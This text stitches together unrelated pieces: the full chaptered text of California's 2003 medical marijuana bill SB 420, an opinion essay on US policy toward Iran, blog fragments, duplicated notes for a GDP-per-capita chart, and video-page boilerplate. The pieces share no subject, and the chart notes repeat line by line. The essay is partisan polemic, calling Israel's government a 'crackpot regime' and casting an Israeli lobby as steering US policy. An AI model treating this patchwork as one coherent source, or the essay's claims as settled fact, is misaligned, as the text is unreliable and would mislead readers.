BILL NUMBER : SB 420 CHAPTERED BILL TEXT CHAPTER 875 FILED WITH SECRETARY OF STATE OCTOBER 12 , 2003 APPROVED BY GOVERNOR OCTOBER 12 , 2003 PASSED THE SENATE SEPTEMBER 11 , 2003 PASSED THE ASSEMBLY SEPTEMBER 10 , 2003 AMENDED IN ASSEMBLY SEPTEMBER 9 , 2003 AMENDED IN ASSEMBLY SEPTEMBER 4 , 2003 AMENDED IN ASSEMBLY AUGUST 18 , 2003 AMENDED IN SENATE MAY 27 , 2003 INTRODUCED BY Senator Vasconcellos ( Principal coauthor : Assembly Member Leno ) ( Coauthors : Assembly Members Goldberg , Hancock , and Koretz ) FEBRUARY 20 , 2003 An act to add Article 2.5 ( commencing with Section 11362.7 ) to Chapter 6 of Division 10 of the Health and Safety Code , relating to controlled substances .
LEGISLATIVE COUNSEL'S DIGEST SB 420 , Vasconcellos .
Medical marijuana .
Existing law , the Compassionate Use Act of 1996 , prohibits any physician from being punished , or denied any right or privilege , for having recommended marijuana to a patient for medical purposes .
The act prohibits the provisions of law making unlawful the possession or cultivation of marijuana from applying to a patient , or to a patient ' s primary caregiver , who possesses or cultivates marijuana for the personal medical purposes of the patient upon the written or oral recommendation or approval of a physician .
This bill would require the State Department of Health Services to establish and maintain a voluntary program for the issuance of identification cards to qualified patients and would establish procedures under which a qualified patient with an identification card may use marijuana for medical purposes .
The bill would specify the department 's duties in this regard , including developing related protocols and forms , and establishing application and renewal fees for the program .
The bill would impose various duties upon county health departments relating to the issuance of identification cards , thus creating a state - mandated local program .
The bill would create various crimes related to the identification card program , thus imposing a state - mandated local program .
This bill would authorize the Attorney General to set forth and clarify details concerning possession and cultivation limits , and other regulations , as specified .
The bill would also authorize the Attorney General to recommend modifications to the possession or cultivation limits set forth in the bill .
The bill would require the Attorney General to develop and adopt guidelines to ensure the security and nondiversion of marijuana grown for medical use , as specified .
The California Constitution requires the state to reimburse local agencies and school districts for certain costs mandated by the state .
Statutory provisions establish procedures for making that reimbursement , including the creation of a State Mandates Claims Fund to pay the costs of mandates that do not exceed $ 1,000,000 statewide and other procedures for claims whose statewide costs exceed $ 1,000,000 .
This bill would provide that no reimbursement is required by this act for specified reasons .
THE PEOPLE OF THE STATE OF CALIFORNIA DO ENACT AS FOLLOWS : SECTION 1 . ( a ) The Legislature finds and declares all of the following : ( 1 ) On November 6 , 1996 , the people of the State of California enacted the Compassionate Use Act of 1996 ( hereafter the act ) , codified in Section 11362.5 of the Health and Safety Code , in order to allow seriously ill residents of the state , who have the oral or written approval or recommendation of a physician , to use marijuana for medical purposes without fear of criminal liability under Sections 11357 and 11358 of the Health and Safety Code .
( 2 ) However , reports from across the state have revealed problems and uncertainties in the act that have impeded the ability of law enforcement officers to enforce its provisions as the voters intended and , therefore , have prevented qualified patients and designated primary caregivers from obtaining the protections afforded by the act .
( 3 ) Furthermore , the enactment of this law , as well as other recent legislation dealing with pain control , demonstrates that more information is needed to assess the number of individuals across the state who are suffering from serious medical conditions that are not being adequately alleviated through the use of conventional medications .
( 4 ) In addition , the act called upon the state and the federal government to develop a plan for the safe and affordable distribution of marijuana to all patients in medical need thereof .
( b)
It is the intent of the Legislature , therefore , to do all of the following : ( 1 ) Clarify the scope of the application of the act and facilitate the prompt identification of qualified patients and their designated primary caregivers in order to avoid unnecessary arrest and prosecution of these individuals and provide needed guidance to law enforcement officers .
( 2 ) Promote uniform and consistent application of the act among the counties within the state .
( 3 ) Enhance the access of patients and caregivers to medical marijuana through collective , cooperative cultivation projects .
( c )
It is also the intent of the Legislature to address additional issues that were not included within the act , and that must be resolved in order to promote the fair and orderly implementation of the act .
( d) The Legislature further finds and declares both of the following : ( 1 ) A state identification card program will further the goals outlined in this section .
( 2 ) With respect to individuals , the identification system established pursuant to this act must be wholly voluntary , and a patient entitled to the protections of Section 11362.5 of the Health and Safety Code need not possess an identification card in order to claim the protections afforded by that section .
( e ) The Legislature further finds and declares that it enacts this act pursuant to the powers reserved to the State of California and its people under the Tenth Amendment to the United States Constitution .
SEC .
2 . Article 2.5 ( commencing with Section 11362.7 ) is added to Chapter 6 of Division 10 of the Health and Safety Code , to read : Article 2.5 .
Medical Marijuana Program 11362.7 .
For purposes of this article , the following definitions shall apply : ( a ) " Attending physician " means an individual who possesses a license in good standing to practice medicine or osteopathy issued by the Medical Board of California or the Osteopathic Medical Board of California and who has taken responsibility for an aspect of the medical care , treatment , diagnosis , counseling , or referral of a patient and who has conducted a medical examination of that patient before recording in the patient 's medical record the physician 's assessment of whether the patient has a serious medical condition and whether the medical use of marijuana is appropriate .
( b ) " Department " means the State Department of Health Services .
( c ) " Person with an identification card " means an individual who is a qualified patient who has applied for and received a valid identification card pursuant to this article .
( d ) " Primary caregiver " means the individual , designated by a qualified patient or by a person with an identification card , who has consistently assumed responsibility for the housing , health , or safety of that patient or person , and may include any of the following : ( 1 ) In any case in which a qualified patient or person with an identification card receives medical care or supportive services , or both , from a clinic licensed pursuant to Chapter 1 ( commencing with Section 1200 ) of Division 2 , a health care facility licensed pursuant to Chapter 2 ( commencing with Section 1250 ) of Division 2 , a residential care facility for persons with chronic life - threatening illness licensed pursuant to Chapter 3.01 ( commencing with Section 1568.01 ) of Division 2 , a residential care facility for the elderly licensed pursuant to Chapter 3.2 ( commencing with Section 1569 ) of Division 2 , a hospice , or a home health agency licensed pursuant to Chapter 8 ( commencing with Section 1725 ) of Division 2 , the owner or operator , or no more than three employees who are designated by the owner or operator , of the clinic , facility , hospice , or home health agency , if designated as a primary caregiver by that qualified patient or person with an identification card .
( 2 ) An individual who has been designated as a primary caregiver by more than one qualified patient or person with an identification card , if every qualified patient or person with an identification card who has designated that individual as a primary caregiver resides in the same city or county as the primary caregiver .
( 3 ) An individual who has been designated as a primary caregiver by a qualified patient or person with an identification card who resides in a city or county other than that of the primary caregiver , if the individual has not been designated as a primary caregiver by any other qualified patient or person with an identification card . ( e ) A primary caregiver shall be at least 18 years of age , unless the primary caregiver is the parent of a minor child who is a qualified patient or a person with an identification card or the primary caregiver is a person otherwise entitled to make medical decisions under state law pursuant to Sections 6922 , 7002 , 7050 , or 7120 of the Family Code .
( f ) " Qualified patient " means a person who is entitled to the protections of Section 11362.5 , but who does not have an identification card issued pursuant to this article .
( g ) " Identification card " means a document issued by the State Department of Health Services that document identifies a person authorized to engage in the medical use of marijuana and the person 's designated primary caregiver , if any .
( h ) " Serious medical condition " means all of the following medical conditions : ( 1 ) Acquired immune deficiency syndrome ( AIDS ) .
( 2 ) Anorexia .
( 3 ) Arthritis .
( 4 ) Cachexia .
( 5 ) Cancer . ( 6 ) Chronic pain .
( 7 ) Glaucoma .
( 8 ) Migraine .
( 9 ) Persistent muscle spasms , including , but not limited to , spasms associated with multiple sclerosis .
( 10 ) Seizures , including , but not limited to , seizures associated with epilepsy .
( 11 ) Severe nausea .
( 12 )
Any other chronic or persistent medical symptom that either : ( A ) Substantially limits the ability of the person to conduct one or more major life activities as defined in the Americans with Disabilities Act of 1990 ( Public Law 101-336 ) .
( B ) If not alleviated , may cause serious harm to the patient 's safety or physical or mental health .
( i ) " Written documentation " means accurate reproductions of those portions of a patient 's medical records that have been created by the attending physician , that contain the information required by paragraph ( 2 ) of subdivision ( a ) of Section 11362.715 , and that the patient may submit to a county health department or the county 's designee as part of an application for an identification card .
11362.71 . ( a ) ( 1 )
The department shall establish and maintain a voluntary program for the issuance of identification cards to qualified patients who satisfy the requirements of this article and voluntarily apply to the identification card program .
( 2 ) The department shall establish and maintain a 24 - hour , toll - free telephone number that will enable state and local law enforcement officers to have immediate access to information necessary to verify the validity of an identification card issued by the department , until a cost - effective Internet Web - based system can be developed for this purpose .
( b) Every county health department , or the county 's designee , shall do all of the following : ( 1 ) Provide applications upon request to individuals seeking to join the identification card program .
( 2 ) Receive and process completed applications in accordance with Section 11362.72 .
( 3 ) Maintain records of identification card programs .
( 4 ) Utilize protocols developed by the department pursuant to paragraph ( 1 ) of subdivision ( d ) . ( 5 ) Issue identification cards developed by the department to approved applicants and designated primary caregivers .
( c )
The county board of supervisors may designate another health - related governmental or nongovernmental entity or organization to perform the functions described in subdivision ( b ) , except for an entity or organization that cultivates or distributes marijuana .
( d)
The department shall develop all of the following : ( 1 ) Protocols that shall be used by a county health department or the county 's designee to implement the responsibilities described in subdivision ( b ) , including , but not limited to , protocols to confirm the accuracy of information contained in an application and to protect the confidentiality of program records .
( 2 ) Application forms that shall be issued to requesting applicants .
( 3 ) An identification card that identifies a person authorized to engage in the medical use of marijuana and an identification card that identifies the person 's designated primary caregiver , if any .
The two identification cards developed pursuant to this paragraph shall be easily distinguishable from each other .
( e )
No person or designated primary caregiver in possession of a valid identification card shall be subject to arrest for possession , transportation , delivery , or cultivation of medical marijuana in an amount established pursuant to this article , unless there is reasonable cause to believe that the information contained in the card is false or falsified , the card has been obtained by means of fraud , or the person is otherwise in violation of the provisions of this article .
( f ) It shall not be necessary for a person to obtain an identification card in order to claim the protections of Section 11362.5 .
11362.715 . ( a ) A person who seeks an identification card shall pay the fee , as provided in Section 11362.755 , and provide all of the following to the county health department or the county 's designee on a form developed and provided by the department : ( 1 ) The name of the person , and proof of his or her residency within the county .
( 2 ) Written documentation by the attending physician in the person ' s medical records stating that the person has been diagnosed with a serious medical condition and that the medical use of marijuana is appropriate .
( 3 ) The name , office address , office telephone number , and California medical license number of the person 's attending physician .
( 4 ) The name and the duties of the primary caregiver . ( 5 ) A government - issued photo identification card of the person and of the designated primary caregiver , if any .
If the applicant is a person under 18 years of age , a certified copy of a birth certificate shall be deemed sufficient proof of identity .
( b )
If the person applying for an identification card lacks the capacity to make medical decisions , the application may be made by the person 's legal representative , including , but not limited to , any of the following : ( 1 ) A conservator with authority to make medical decisions .
( 2 ) An attorney - in - fact under a durable power of attorney for health care or surrogate decisionmaker authorized under another advanced health care directive .
( 3 ) Any other individual authorized by statutory or decisional law to make medical decisions for the person .
( c ) The legal representative described in subdivision ( b ) may also designate in the application an individual , including himself or herself , to serve as a primary caregiver for the person , provided that the individual meets the definition of a primary caregiver .
( d) The person or legal representative submitting the written information and documentation described in subdivision ( a ) shall retain a copy thereof .
11362.72 . ( a ) Within 30 days of receipt of an application for an identification card , a county health department or the county 's designee shall do all of the following : ( 1 ) For purposes of processing the application , verify that the information contained in the application is accurate .
If the person is less than 18 years of age , the county health department or its designee shall also contact the parent with legal authority to make medical decisions , legal guardian , or other person or entity with legal authority to make medical decisions , to verify the information .
( 2 ) Verify with the Medical Board of California or the Osteopathic Medical Board of California that the attending physician has a license in good standing to practice medicine or osteopathy in the state .
( 3 ) Contact the attending physician by facsimile , telephone , or mail to confirm that the medical records submitted by the patient are a true and correct copy of those contained in the physician 's office records .
When contacted by a county health department or the county ' s designee , the attending physician shall confirm or deny that the contents of the medical records are accurate .
( 4 ) Take a photograph or otherwise obtain an electronically transmissible image of the applicant and of the designated primary caregiver , if any .
( 5 ) Approve or deny the application .
If an applicant who meets the requirements of Section 11362.715 can establish that an identification card is needed on an emergency basis , the county or its designee shall issue a temporary identification card that shall be valid for 30 days from the date of issuance .
The county , or its designee , may extend the temporary identification card for no more than 30 days at a time , so long as the applicant continues to meet the requirements of this paragraph .
( b)
If the county health department or the county 's designee approves the application , it shall , within 24 hours , or by the end of the next working day of approving the application , electronically transmit the following information to the department : ( 1 ) A unique user identification number of the applicant .
( 2 ) The date of expiration of the identification card .
( 3 ) The name and telephone number of the county health department or the county 's designee that has approved the application .
( c )
The county health department or the county 's designee shall issue an identification card to the applicant and to his or her designated primary caregiver , if any , within five working days of approving the application .
( d) In any case involving an incomplete application , the applicant shall assume responsibility for rectifying the deficiency .
The county shall have 14 days from the receipt of information from the applicant pursuant to this subdivision to approve or deny the application .
11362.735 . ( a ) An identification card issued by the county health department shall be serially numbered and shall contain all of the following : ( 1 ) A unique user identification number of the cardholder .
( 2 ) The date of expiration of the identification card .
( 3 ) The name and telephone number of the county health department or the county 's designee that has approved the application .
( 4 ) A 24 - hour , toll - free telephone number , to be maintained by the department , that will enable state and local law enforcement officers to have immediate access to information necessary to verify the validity of the card .
( 5 ) Photo identification of the cardholder .
( b ) A separate identification card shall be issued to the person 's designated primary caregiver , if any , and shall include a photo identification of the caregiver .
11362.74 . ( a ) The county health department or the county 's designee may deny an application only for any of the following reasons : ( 1 ) The applicant did not provide the information required by Section 11362.715 , and upon notice of the deficiency pursuant to subdivision ( d ) of Section 11362.72 , did not provide the information within 30 days .
( 2 ) The county health department or the county 's designee determines that the information provided was false .
( 3 ) The applicant does not meet the criteria set forth in this article .
( b )
Any person whose application has been denied pursuant to subdivision ( a ) may not reapply for six months from the date of denial unless otherwise authorized by the county health department or the county 's designee or by a court of competent jurisdiction .
( c ) Any person whose application has been denied pursuant to subdivision ( a ) may appeal that decision to the department .
The county health department or the county 's designee shall make available a telephone number or address to which the denied applicant can direct an appeal .
11362.745 . ( a) An identification card shall be valid for a period of one year .
( b ) Upon annual renewal of an identification card , the county health department or its designee shall verify all new information and may verify any other information that has not changed .
( c )
The county health department or the county 's designee shall transmit its determination of approval or denial of a renewal to the department .
11362.755 . ( a ) The department shall establish application and renewal fees for persons seeking to obtain or renew identification cards that are sufficient to cover the expenses incurred by the department , including the startup cost , the cost of reduced fees for Medi-Cal beneficiaries in accordance with subdivision ( b ) , the cost of identifying and developing a cost - effective Internet Web - based system , and the cost of maintaining the 24 - hour toll - free telephone number .
Each county health department or the county 's designee may charge an additional fee for all costs incurred by the county or the county 's designee for administering the program pursuant to this article .
( b ) Upon satisfactory proof of participation and eligibility in the Medi-Cal program , a Medi-Cal beneficiary shall receive a 50 percent reduction in the fees established pursuant to this section .
11362.76 . ( a ) A person who possesses an identification card shall : ( 1 ) Within seven days , notify the county health department or the county 's designee of any change in the person 's attending physician or designated primary caregiver , if any .
( 2 ) Annually submit to the county health department or the county ' s designee the following : ( A ) Updated written documentation of the person 's serious medical condition .
( B ) The name and duties of the person 's designated primary caregiver , if any , for the forthcoming year .
( b)
If a person who possesses an identification card fails to comply with this section , the card shall be deemed expired .
If an identification card expires , the identification card of any designated primary caregiver of the person shall also expire .
( c )
If the designated primary caregiver has been changed , the previous primary caregiver shall return his or her identification card to the department or to the county health department or the county 's designee .
( d) If the owner or operator or an employee of the owner or operator of a provider has been designated as a primary caregiver pursuant to paragraph ( 1 ) of subdivision ( d ) of Section 11362.7 , of the qualified patient or person with an identification card , the owner or operator shall notify the county health department or the county 's designee , pursuant to Section 11362.715 , if a change in the designated primary caregiver has occurred .
11362.765 . ( a ) Subject to the requirements of this article , the individuals specified in subdivision ( b ) shall not be subject , on that sole basis , to criminal liability under Section 11357 , 11358 , 11359 , 11360 , 11366 , 11366.5 , or 11570 .
However , nothing in this section shall authorize the individual to smoke or otherwise consume marijuana unless otherwise authorized by this article , nor shall anything in this section authorize any individual or group to cultivate or distribute marijuana for profit .
( b ) Subdivision ( a ) shall apply to all of the following : ( 1 ) A qualified patient or a person with an identification card who transports or processes marijuana for his or her own personal medical use .
( 2 ) A designated primary caregiver who transports , processes , administers , delivers , or gives away marijuana for medical purposes , in amounts not exceeding those established in subdivision ( a ) of Section 11362.77 , only to the qualified patient of the primary caregiver , or to the person with an identification card who has designated the individual as a primary caregiver .
( 3 ) Any individual who provides assistance to a qualified patient or a person with an identification card , or his or her designated primary caregiver , in administering medical marijuana to the qualified patient or person or acquiring the skills necessary to cultivate or administer marijuana for medical purposes to the qualified patient or person . ( c ) A primary caregiver who receives compensation for actual expenses , including reasonable compensation incurred for services provided to an eligible qualified patient or person with an identification card to enable that person to use marijuana under this article , or for payment for out - of - pocket expenses incurred in providing those services , or both , shall not , on the sole basis of that fact , be subject to prosecution or punishment under Section 11359 or 11360 .
11362.77 . ( a ) A qualified patient or primary caregiver may possess no more than eight ounces of dried marijuana per qualified patient .
In addition , a qualified patient or primary caregiver may also maintain no more than six mature or 12 immature marijuana plants per qualified patient .
( b )
If a qualified patient or primary caregiver has a doctor 's recommendation that this quantity does not meet the qualified patient ' s medical needs , the qualified patient or primary caregiver may possess an amount of marijuana consistent with the patient 's needs .
( c ) Counties and cities may retain or enact medical marijuana guidelines allowing qualified patients or primary caregivers to exceed the state limits set forth in subdivision ( a ) . ( d)
Only the dried mature processed flowers of female cannabis plant or the plant conversion shall be considered when determining allowable quantities of marijuana under this section .
( e ) The Attorney General may recommend modifications to the possession or cultivation limits set forth in this section .
These recommendations , if any , shall be made to the Legislature no later than December 1 , 2005 , and may be made only after public comment and consultation with interested organizations , including , but not limited to , patients , health care professionals , researchers , law enforcement , and local governments .
Any recommended modification shall be consistent with the intent of this article and shall be based on currently available scientific research . ( f ) A qualified patient or a person holding a valid identification card , or the designated primary caregiver of that qualified patient or person , may possess amounts of marijuana consistent with this article .
11362.775 .
Qualified patients , persons with valid identification cards , and the designated primary caregivers of qualified patients and persons with identification cards , who associate within the State of California in order collectively or cooperatively to cultivate marijuana for medical purposes , shall not solely on the basis of that fact be subject to state criminal sanctions under Section 11357 , 11358 , 11359 , 11360 , 11366 , 11366.5 , or 11570 .
11362.78 .
A state or local law enforcement agency or officer shall not refuse to accept an identification card issued by the department unless the state or local law enforcement agency or officer has reasonable cause to believe that the information contained in the card is false or fraudulent , or the card is being used fraudulently .
11362.785 . ( a ) Nothing in this article shall require any accommodation of any medical use of marijuana on the property or premises of any place of employment or during the hours of employment or on the property or premises of any jail , correctional facility , or other type of penal institution in which prisoners reside or persons under arrest are detained .
( b ) Notwithstanding subdivision ( a ) , a person shall not be prohibited or prevented from obtaining and submitting the written information and documentation necessary to apply for an identification card on the basis that the person is incarcerated in a jail , correctional facility , or other penal institution in which prisoners reside or persons under arrest are detained .
( c ) Nothing in this article shall prohibit a jail , correctional facility , or other penal institution in which prisoners reside or persons under arrest are detained , from permitting a prisoner or a person under arrest who has an identification card , to use marijuana for medical purposes under circumstances that will not endanger the health or safety of other prisoners or the security of the facility .
( d) Nothing in this article shall require a governmental , private , or any other health insurance provider or health care service plan to be liable for any claim for reimbursement for the medical use of marijuana .
11362.79 .
Nothing in this article shall authorize a qualified patient or person with an identification card to engage in the smoking of medical marijuana under any of the following circumstances : ( a) In any place where smoking is prohibited by law .
( b ) In or within 1,000 feet of the grounds of a school , recreation center , or youth center , unless the medical use occurs within a residence .
( c ) On a schoolbus .
( d) While in a motor vehicle that is being operated .
( e ) While operating a boat .
11362.795 . ( a ) ( 1 )
Any criminal defendant who is eligible to use marijuana pursuant to Section 11362.5 may request that the court confirm that he or she is allowed to use medical marijuana while he or she is on probation or released on bail .
( 2 ) The court 's decision and the reasons for the decision shall be stated on the record and an entry stating those reasons shall be made in the minutes of the court .
( 3 ) During the period of probation or release on bail , if a physician recommends that the probationer or defendant use medical marijuana , the probationer or defendant may request a modification of the conditions of probation or bail to authorize the use of medical marijuana .
( 4 ) The court 's consideration of the modification request authorized by this subdivision shall comply with the requirements of this section .
( b ) ( 1 ) Any person who is to be released on parole from a jail , state prison , school , road camp , or other state or local institution of confinement and who is eligible to use medical marijuana pursuant to Section 11362.5 may request that he or she be allowed to use medical marijuana during the period he or she is released on parole .
A parolee 's written conditions of parole shall reflect whether or not a request for a modification of the conditions of his or her parole to use medical marijuana was made , and whether the request was granted or denied .
( 2 ) During the period of the parole , where a physician recommends that the parolee use medical marijuana , the parolee may request a modification of the conditions of the parole to authorize the use of medical marijuana .
( 3 ) Any parolee whose request to use medical marijuana while on parole was denied may pursue an administrative appeal of the decision .
Any decision on the appeal shall be in writing and shall reflect the reasons for the decision .
( 4 ) The administrative consideration of the modification request authorized by this subdivision shall comply with the requirements of this section .
11362.8 .
No professional licensing board may impose a civil penalty or take other disciplinary action against a licensee based solely on the fact that the licensee has performed acts that are necessary or appropriate to carry out the licensee 's role as a designated primary caregiver to a person who is a qualified patient or who possesses a lawful identification card issued pursuant to Section 11362.72 .
However , this section shall not apply to acts performed by a physician relating to the discussion or recommendation of the medical use of marijuana to a patient .
These discussions or recommendations , or both , shall be governed by Section 11362.5 .
11362.81 . ( a ) A person specified in subdivision ( b ) shall be subject to the following penalties : ( 1 ) For the first offense , imprisonment in the county jail for no more than six months or a fine not to exceed one thousand dollars ( $ 1,000 ) , or both .
( 2 ) For a second or subsequent offense , imprisonment in the county jail for no more than one year , or a fine not to exceed one thousand dollars ( $ 1,000 ) , or both .
( b ) Subdivision ( a ) applies to any of the following : ( 1 ) A person who fraudulently represents a medical condition or fraudulently provides any material misinformation to a physician , county health department or the county 's designee , or state or local law enforcement agency or officer , for the purpose of falsely obtaining an identification card .
( 2 ) A person who steals or fraudulently uses any person 's identification card in order to acquire , possess , cultivate , transport , use , produce , or distribute marijuana . ( 3 ) A person who counterfeits , tampers with , or fraudulently produces an identification card . ( 4 ) A person who breaches the confidentiality requirements of this article to information provided to , or contained in the records of , the department or of a county health department or the county 's designee pertaining to an identification card program .
( c ) In addition to the penalties prescribed in subdivision ( a ) , any person described in subdivision ( b ) may be precluded from attempting to obtain , or obtaining or using , an identification card for a period of up to six months at the discretion of the court .
( d) In addition to the requirements of this article , the Attorney General shall develop and adopt appropriate guidelines to ensure the security and nondiversion of marijuana grown for medical use by patients qualified under the Compassionate Use Act of 1996 .
11362.82 .
If any section , subdivision , sentence , clause , phrase , or portion of this article is for any reason held invalid or unconstitutional by any court of competent jurisdiction , that portion shall be deemed a separate , distinct , and independent provision , and that holding shall not affect the validity of the remaining portion thereof .
11362.83 .
Nothing in this article shall prevent a city or other local governing body from adopting and enforcing laws consistent with this article .
SEC .
3 . No reimbursement is required by this act pursuant to Section 6 of Article XIII B of the California Constitution for certain costs that may be incurred by a local agency or school district because in that regard this act creates a new crime or infraction , eliminates a crime or infraction , or changes the penalty for a crime or infraction , within the meaning of Section 17556 of the Government Code , or changes the definition of a crime within the meaning of Section 6 of Article XIII B of the California Constitution .
In addition , no reimbursement is required by this act pursuant to Section 6 of Article XIII B of the California Constitution for other costs mandated by the state because this act includes additional revenue that is specifically intended to fund the costs of the state mandate in an amount sufficient to fund the cost of the state mandate , within the meaning of Section 17556 of the Government Code .
Israeli media reports that visiting National Security Adviser General Jim Jones and Secretary of Defense Robert Gates have told the government of Prime Minister Benjamin Netanyahu to stop complaining about Iran because the US is preparing to take action " in eight weeks " demonstrate that even when everything changes in Washington , nothing changes .
President Barack Obama has claimed that a peaceful settlement of the Palestinian - Israeli conflict is a high priority but the Israelis and their allies in congress and the media have been able to stonewall the issue .
Israel has made no concessions on its settlement policy , which is rightly seen as the single biggest obstacle to eventual creation of a Palestinian state , and has instead pushed ahead with new building and confiscations of Arab homes .
Obama has protested both Israeli actions but done nothing else , meaning that Israel has determined that the new US president ’s policies are toothless , giving it a free hand to deal with the Arabs .
Vice President Joe Biden ’s comments that Israel is free to attack Iran if it sees fit was a warning that worse might be coming .
If the Israeli reports are true , it would appear that the Obama Administration has now bought completely into the Israeli view of Iran and is indicating to Tel Aviv that it will fall into line to bring the Mullahs to their knees .
In short , Israel gets what it wants and Washington yet again surrenders .
President Obama ’s ultimatum that Iran must start talks and quickly " or else " may be based on the belief that pressuring the government in Tehran will produce a positive result .
If that is the judgment , it is wrong .
Sanctions did not force Italy to change its policies in 1935 , nor those of Japan five years later .
Saddam Hussein survived them in the 1990s , and they have most certainly not brought the Cuban government down after fifty years of trying .
The Iranian government will only respond by closing ranks against foreign pressure .
Quite possibly , the only result an enhanced sanctions regime backed by a military threat will produce is a war , which would be catastrophic both for the United States and for Iran .
Nor would it be particularly good for Israel in spite of what the current crackpot regime in Tel Aviv might think .
And the usual characters are lining up to play ball .
The US mainstream media is united in supporting without any examination the view that Iran is intending to develop a nuclear device and will likely soon have one .
It is clear that leading members of the Obama Administration , including Biden and Secretary of State Hillary Clinton believe the same thing .
And Congress is never far behind when it comes to supporting any nonsense coming out of Israel .
On July 30th the Senate passed a bill that prohibits companies that sell gasoline and other refined oil products to Iran from also receiving any Energy Department contracts to provide crude oil for the US Strategic Petroleum Reserve .
Senator Joseph Lieberman of Connecticut is also drafting a bill to block all oil imports to Iran .
Yes , the same Joseph Lieberman who has never hesitated to put Israel first even as he wraps his rhetoric in the American flag .
A pusillanimous Democratic Congress failed to strip Lieberman of his chairmanship of the Homeland Security committee even after he ran for the Senate as an independent and campaigned actively for Republican John McCain .
Lieberman therefore remains a powerful senator instead of a political turncoat who should be rightly shunned by his former colleagues .
Lieberman ’s bill , which already has in draft 67 co-sponsors in the Senate , is a de facto declaration of war which could easily start World War III .
It would block all imports of refined petroleum products to Iran , which sits on sea of oil but has only limited refinery capacity .
Its economy would grind to a halt .
According to the Israeli media , other sanctions such as banning trade insurance are being considered , which would make it difficult for Iran to do any business internationally .
Sanctions might also be extended laterally and placed on any company that trades with Iran .
Iranian - flagged ships might also be refused docking permission in Western seaports and the country ’s airplanes could be denied landing rights at European and American airports .
Lost in the shuffle is any United States national interest .
Congress seems to be convinced that Iran threatens the United States and must be dealt with , a fiction no doubt generated by a barrage of " position papers " emanating from the American Israel Public Affairs Committee ( AIPAC ) .
But the facts tell us otherwise .
Iran ’s leadership may be an unpleasant crew and the currently unfolding show trials complete with possibly coerced confessions is a disgraceful spectacle , but it just might be that claims that the US and some western Europeans have been meddling in the country ’s politics have more than a grain of truth to them .
Iranian paranoia vis -à - vis the rest of the world , and particularly the United States , is all too understandable .
And its alleged nuclear ambitions are far from a proven case .
In its quarterly reports on Iran ’s monitored nuclear program , the United Nations ’ International Atomic Energy Agency continues to assert that there is absolutely no evidence that Iran has a weapons program .
The most recent examination of the Iranian nuclear program was conducted by the highly respected US State Department ’s Bureau of Intelligence and Research ( INR ) .
Its report , released last week , stated that there is " … no evidence that Iran has yet made the decision to produce highly enriched uranium , and INR assesses that Iran is unlikely to make such a decision for at least as long as international pressure and scrutiny persist . "
It concluded that even if Iran makes the essentially political decision to construct a nuclear device it will not have enough fissile material to do so before 2013 .
The INR assessment used current intelligence to update the CIA National Intelligence report of 2007 that concluded that there could not be a nuclear device until after 2010 even if an accelerated program of development were to be initiated .
Military analysts have also noted that Iran would be unable to deliver the weapon on target even if it were able to overcome the considerable technical obstacles to building the bomb itself .
It is curious that in spite of the fact that there is a consensus that Iran is not yet seeking a nuclear weapon and has no capability to accumulate sufficient weapons grade uranium to do so for some time to come , US politicians and media accept without question the Israeli argument that Iran is hell bent on obtaining such a device and will do so soon .
Perhaps American politicians should stop listening to the Israelis and should start reading the reports being prepared at great expense by the United States intelligence community .
All of which leads to another way of looking at the issue and that is , of course , that it is all about Israel .
Iran is without doubt a major power in the Persian Gulf region even if it does not threaten the United States or Europe .
It potentially does threaten Israel even if the track record shows the Iran has not attacked anyone since the seventeenth century while Israel itself has been engaged in something like perpetual warfare with all its neighbors .
So the assumption must be that Israel and its very effective lobby are driving the push for war with Iran against the real interests of the United States .
But the real question has to be , " Why is Obama , who must know that the argument against Iran is essentially bogus , buying into it ? "
Has he already surrendered to AIPAC ?
If it is true that at the end of September the US government will begin to tighten the screws on Iran we Americans will all know the answers to those questions and we will quite likely be set on the path for yet another " preventive " war .
w w w Mustyworld .
com
Mustynutz Lives !
follow me down the dark path of my imagination and my life ..
What is the GDP Per Capita for Every Country ?
The interactive chart below represents the GDP per capita for each country .
Click on any of the buttons to view the data for that particular group of nations .
You can highlight a particular country by selecting it in the dropdown box .
For more details , check the notes section , or leave a comment below .
The data was compiled from the 2008 CIA World Factbook .
Notes GDP Per Capita refers to the gross domestic product per person .
GDP includes personal consumption , investments , government spending and exports that a country makes .
The total value of imports are subtracted from the total .
refers to the gross domestic product per person .
GDP includes personal consumption , investments , government spending and exports that a country makes .
The total value of imports are subtracted from the total .
Amazonia : The eight nations in the Amazon River basin in South America .
: The eight nations in the Amazon River basin in South America .
NICs : Newly Industrialized Countries
: Newly Industrialized Countries BRICs :
This is a group of four large and developing countries that was proposed by Goldman Sachs in 2001 .
" BRIC " is an acronym that represents the four countries in the group : Brazil , Russia , India and China .
: This is a group of four large and developing countries that was proposed by Goldman Sachs in 2001 .
" BRIC " is an acronym that represents the four countries in the group : Brazil , Russia , India and China .
Commonwealth : ( Commonwealth of Nations ) 53 - member orginization of independent states ; for the most part they were former components of of the British Empire .
: ( Commonwealth of Nations ) 53 - member orginization of independent states ; for the most part they were former components of of the British Empire .
G8 : Northern hemisphere nations in the Group of Eight .
Representatives from these countries meet annually .
The forum was initiated in 1975 by France .
: Northern hemisphere nations in the Group of Eight .
Representatives from these countries meet annually .
The forum was initiated in 1975 by France .
G20 : Group of 20 , which includes the 19 largest economies and the European Union .
: Group of 20 , which includes the 19 largest economies and the European Union .
ASEAN : Association of Southeast Asian Nations
: Association of Southeast Asian Nations OECD :
The Organization for Economic Co-operation and Development was formed in 1948 and includes 30 countries committed to a free - market economy and democracy .
: The Organization for Economic Co-operation and Development was formed in 1948 and includes 30 countries committed to a free - market economy and democracy .
OPEC : The Organization of the Petroleum Exporting Countries is a cartel of major oil - producing nations .
: The Organization of the Petroleum Exporting Countries is a cartel of major oil - producing nations .
NATO : The North Atlantic Treaty Organization is a military alliance of many north american and european nations .
: The North Atlantic Treaty Organization is a military alliance of many north american and european nations .
Communist :
This group includes current and former communist nations .
: This group includes current and former communist nations .
Most Populous , Least Populous , Largest Area , Smallest Area :
These groups comprise the twenty superlatives specified by the group title .
: These groups comprise the twenty superlatives specified by the group title .
Landlocked :
These countries do not have any coastline .
Thumbnail
You have already voted for this video .
We appreciate your help .
You have already reported this video .
www.mediahangout.blogspot****
This is highlights from Watford Vs Readin ( 20th September 2008 ) which include ...
www.mediahangout.blogspot****
This is highlights from Watford Vs Readin ( 20th September 2008 ) which includes the " goal that never was " .
What do we do now ???
EUROPEAN GRAND PRIX
